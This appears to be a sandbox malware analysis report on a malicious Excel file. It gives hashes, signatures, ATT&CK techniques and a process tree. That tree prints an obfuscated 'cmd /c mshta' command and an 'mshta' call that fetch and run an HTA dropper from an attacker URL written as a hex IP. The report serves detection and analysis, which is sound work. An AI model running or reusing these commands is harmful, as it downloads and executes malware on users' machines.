Analysis

  • max time kernel
    177s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 01:47

General

  • Target

    file-105.xls

  • Size

    65KB

  • MD5

    53bea098b495f96218c09f17e22fad9d

  • SHA1

    6915db9be1e538e396e5f1d59c640158e26af73b

  • SHA256

    da0decbda63cc2fbb3b768d77078db1ef537aff2878d873a2c6614df519f9716

  • SHA512

    1ad2e399b79afff95cc2cc337a181ac20cb5523b474d5d6ec4e9de4fee336f605ef871189700ed64052f437b07b84598e1c2920b447f72b5491dbea563ef5c5f

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xc12a24f5/cc.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\file-105.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:392
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xc12a24f5/cc.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:872

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1924-54-0x000000002FBE1000-0x000000002FBE4000-memory.dmp
    Filesize

    12KB

  • memory/1924-55-0x0000000071A51000-0x0000000071A53000-memory.dmp
    Filesize

    8KB

  • memory/1924-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1924-57-0x0000000075CE1000-0x0000000075CE3000-memory.dmp
    Filesize

    8KB

  • memory/1924-68-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB